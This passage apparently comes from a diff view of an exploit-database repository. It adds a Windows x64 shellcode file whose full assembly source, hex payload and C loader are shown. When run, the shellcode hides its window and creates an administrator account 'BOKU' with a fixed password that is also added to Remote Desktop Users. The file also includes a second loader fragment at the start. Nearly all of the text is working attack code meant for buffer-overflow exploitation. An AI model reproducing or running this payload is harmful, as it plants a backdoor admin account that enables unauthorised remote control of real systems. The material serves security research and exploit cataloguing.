"\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
"\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
"\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
"\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
"\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
"\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
"\x48\x83\xec\x20\x41\xff\xd6";
unsigned int payload_len = 205;
exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
RtlMoveMemory(exec, payload, payload_len);
rv = VirtualProtect(exec, payload_len, PAGE_EXECUTE_READ, &oldprotect);
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);
WaitForSingleObject(th, -1);
}

193
shellcodes/windows_x86-64/49820.c Normal file
View file

@ -0,0 +1,193 @@
# Shellcode Title: Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)
# Shellcode Author: Bobby Cooke (boku)
# Date: 02/05/2021
# Tested on: Windows 10 v2004 (x64)
# Compiled from: Kali Linux (x86_64)
# Full Disclosure: github.com/boku7/x64win-AddRdpAdminShellcode
# Shellcode Description:
# 64bit Windows 10 shellcode that adds user BOKU:SP3C1ALM0V3 to the system and the localgroups
# Administrators & "Remote Desktop Users". Position Independent Code (PIC) that dynamically resolves
# KERNEL32 DLL via PEB & LDR. Shellcode contains no null bytes, and therefor can be used on typical
# stack based Buffer OverFlow vulnerabilities. Shellcode must be executed from a process with either
# a HIGH or SYSTEM integrity level.
; nasm -f win64 addRdpAdmin.asm -o addRdpAdmin.o
; for i in $(objdump -D addRdpAdmin.o | grep "^ " | cut -f2); do echo -n "\x$i" ; done
; Get kernel32.dll base address
xor rdi, rdi ; RDI = 0x0
mul rdi ; RAX&RDX =0x0
mov rbx, gs:[rax+0x60] ; RBX = Address_of_PEB
mov rbx, [rbx+0x18] ; RBX = Address_of_LDR
mov rbx, [rbx+0x20] ; RBX = 1st entry in InitOrderModuleList / ntdll.dll
mov rbx, [rbx] ; RBX = 2nd entry in InitOrderModuleList / kernelbase.dll
mov rbx, [rbx] ; RBX = 3rd entry in InitOrderModuleList / kernel32.dll
mov rbx, [rbx+0x20] ; RBX = &kernel32.dll ( Base Address of kernel32.dll)
mov r8, rbx ; RBX & R8 = &kernel32.dll
; Get kernel32.dll ExportTable Address
mov ebx, [rbx+0x3C] ; RBX = Offset NewEXEHeader
add rbx, r8 ; RBX = &kernel32.dll + Offset NewEXEHeader = &NewEXEHeader
xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add
add cx, 0x88ff
shr rcx, 0x8 ; RCX = 0x88ff --> 0x88
mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable
add rdx, r8 ; RDX = &kernel32.dll + RVA ExportTable = &ExportTable
; Get &AddressTable from Kernel32.dll ExportTable
xor r10, r10
mov r10d, [rdx+0x1C] ; RDI = RVA AddressTable
add r10, r8 ; R10 = &AddressTable
; Get &NamePointerTable from Kernel32.dll ExportTable
xor r11, r11
mov r11d, [rdx+0x20] ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable
add r11, r8 ; R11 = &NamePointerTable (Memory Address of Kernel32.dll Export NamePointerTable)
; Get &OrdinalTable from Kernel32.dll ExportTable
xor r12, r12
mov r12d, [rdx+0x24] ; R12 = RVA OrdinalTable
add r12, r8 ; R12 = &OrdinalTable
jmp short apis
; Get the address of the API from the Kernel32.dll ExportTable
getapiaddr:
pop rbx ; save the return address for ret 2 caller after API address is found
pop rcx ; Get the string length counter from stack
xor rax, rax ; Setup Counter for resolving the API Address after finding the name string
mov rdx, rsp ; RDX = Address of API Name String to match on the Stack
push rcx ; push the string length counter to stack
loop:
mov rcx, [rsp] ; reset the string length counter from the stack
xor rdi,rdi ; Clear RDI for setting up string name retrieval
mov edi, [r11+rax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
add rdi, r8 ; RDI = &NameString = RVA NameString + &kernel32.dll
mov rsi, rdx ; RSI = Address of API Name String to match on the Stack (reset to start of string)
repe cmpsb ; Compare strings at RDI & RSI
je resolveaddr ; If match then we found the API string. Now we need to find the Address of the API
incloop:
inc rax
jmp short loop
; Find the address of GetProcAddress by using the last value of the Counter
resolveaddr:
pop rcx ; remove string length counter from top of stack
mov ax, [r12+rax*2] ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of kernel32.<API>
mov eax, [r10+rax*4] ; RAX = RVA API = [&AddressTable + API OrdinalNumber]
add rax, r8 ; RAX = Kernel32.<API> = RVA kernel32.<API> + kernel32.dll BaseAddress
push rbx ; place the return address from the api string call back on the top of the stack
ret ; return to API caller
apis: ; API Names to resolve addresses
; WinExec | String length : 7
xor rcx, rcx
add cl, 0x7 ; String length for compare string
mov rax, 0x9C9A87BA9196A80F ; not 0x9C9A87BA9196A80F = 0xF0,WinExec
not rax ;mov rax, 0x636578456e6957F0 ; cexEniW,0xF0 : 636578456e6957F0 - Did Not to avoid WinExec returning from strings static analysis
shr rax, 0x8 ; cexEniW,0xF0 --> 0x00,cexEniW
push rax
push rcx ; push the string length counter to stack
call getapiaddr ; Get the address of the API from Kernel32.dll ExportTable
mov r14, rax ; R14 = Kernel32.WinExec Address
jmp short command
WinExec:
; UINT WinExec(
; LPCSTR lpCmdLine, => RCX = <COMMAND STRING> + 0x00 (Null Terminated)
; UINT uCmdShow => RDX = 0x0 = SW_HIDE
; );
xor rdx, rdx ; RDX = 0x0 = SW_HIDE
sub rsp, 0x20 ; WinExec clobbers first 0x20 bytes of stack (Overwrites our command string when proxied to CreatProcessA)
call r14 ; Call WinExec(<COMMNAD>, SW_HIDE)
add rsp, 0x20 ; Fix stack
ret
command:
; WinExec("cmd.exe /c net user BOKU SP3C1ALM0V3 /add && net localgroup Administrators BOKU /add && net localgroup \"Remote Desktop Users\" BOKU /add", 0x0);
; 63 6D 64 2E 65 78 65 20 2F 63 20 6E 65 74 20 75 cmd.exe /c net u
; 73 65 72 20 42 4F 4B 55 20 53 50 33 43 31 41 4C ser BOKU SP3C1AL
; 4D 30 56 33 20 2F 61 64 64 20 26 26 20 6E 65 74 M0V3 /add && net
; 20 6C 6F 63 61 6C 67 72 6F 75 70 20 41 64 6D 69 localgroup Admi
; 6E 69 73 74 72 61 74 6F 72 73 20 42 4F 4B 55 20 nistrators BOKU
; 2F 61 64 64 20 26 26 20 6E 65 74 20 6C 6F 63 61 /add && net loca
; 6C 67 72 6F 75 70 20 22 52 65 6D 6F 74 65 20 44 lgroup "Remote D
; 65 73 6B 74 6F 70 20 55 73 65 72 73 22 20 42 4F esktop Users" BO
; 4B 55 20 2F 61 64 64 00 KU /add.
; String length : 135
mov rax, 0x6464612f20554bFF ; dda/ UK : 6464612f20554b
shr rax, 0x8
push rax
mov rax, 0x4f42202273726573 ; OB "sres : 4f42202273726573
push rax
mov rax, 0x5520706f746b7365 ; U potkse : 5520706f746b7365
push rax
mov rax, 0x442065746f6d6552 ; D etomeR : 442065746f6d6552
push rax
mov rax, 0x222070756f72676c ; " puorgl : 222070756f72676c
push rax
mov rax, 0x61636f6c2074656e ; acol ten : 61636f6c2074656e
push rax
mov rax, 0x202626206464612f ; && dda/ : 202626206464612f
push rax
mov rax, 0x20554b4f42207372 ; UKOB sr : 20554b4f42207372
push rax
mov rax, 0x6f7461727473696e ; otartsin : 6f7461727473696e
push rax
mov rax, 0x696d64412070756f ; imdA puo : 696d64412070756f
push rax
mov rax, 0x72676c61636f6c20 ; rglacol : 72676c61636f6c20
push rax
mov rax, 0x74656e2026262064 ; ten && d : 74656e2026262064
push rax
mov rax, 0x64612f203356304d ; da/ 3V0M : 64612f203356304d
push rax
mov rax, 0x4c41314333505320 ; LA1C3PS : 4c41314333505320
push rax
mov rax, 0x554b4f4220726573 ; UKOB res : 554b4f4220726573
push rax
mov rax, 0x752074656e20632f ; u ten c/ : 752074656e20632f
push rax
mov rax, 0x206578652e646d63 ; exe.dmc : 206578652e646d63
push rax
mov rcx, rsp ; RCX = <COMMAND STRING>,0x0
call WinExec
###########################################################################################################################################
#include <windows.h>
// C Shellcode Run Code referenced from reenz0h (twitter: @sektor7net)
int main(void) {
void* exec_mem;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
unsigned char payload[] =
"\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49"
"\x89\xd8\x8b\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44"
"\x8b\x52\x1c\x4d\x01\xc2\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59"
"\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff"
"\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91"
"\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0\xff\xff\xff\x49\x89\xc6\xeb\x0f\x48\x31\xd2\x48\x83\xec\x20"
"\x41\xff\xd6\x48\x83\xc4\x20\xc3\x48\xb8\xff\x4b\x55\x20\x2f\x61\x64\x64\x48\xc1\xe8\x08\x50\x48\xb8\x73\x65\x72\x73\x22"
"\x20\x42\x4f\x50\x48\xb8\x65\x73\x6b\x74\x6f\x70\x20\x55\x50\x48\xb8\x52\x65\x6d\x6f\x74\x65\x20\x44\x50\x48\xb8\x6c\x67"
"\x72\x6f\x75\x70\x20\x22\x50\x48\xb8\x6e\x65\x74\x20\x6c\x6f\x63\x61\x50\x48\xb8\x2f\x61\x64\x64\x20\x26\x26\x20\x50\x48"
"\xb8\x72\x73\x20\x42\x4f\x4b\x55\x20\x50\x48\xb8\x6e\x69\x73\x74\x72\x61\x74\x6f\x50\x48\xb8\x6f\x75\x70\x20\x41\x64\x6d"
"\x69\x50\x48\xb8\x20\x6c\x6f\x63\x61\x6c\x67\x72\x50\x48\xb8\x64\x20\x26\x26\x20\x6e\x65\x74\x50\x48\xb8\x4d\x30\x56\x33"
"\x20\x2f\x61\x64\x50\x48\xb8\x20\x53\x50\x33\x43\x31\x41\x4c\x50\x48\xb8\x73\x65\x72\x20\x42\x4f\x4b\x55\x50\x48\xb8\x2f"
"\x63\x20\x6e\x65\x74\x20\x75\x50\x48\xb8\x63\x6d\x64\x2e\x65\x78\x65\x20\x50\x48\x89\xe1\xe8\x2a\xff\xff\xff";
unsigned int payload_len = 387;
exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// Copy payload to new buffer
RtlMoveMemory(exec_mem, payload, payload_len);
// Make new buffer as executable
rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
// If all good, run the payload
if (rv != 0) {
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0);
WaitForSingleObject(th, -1);
}
return 0;
}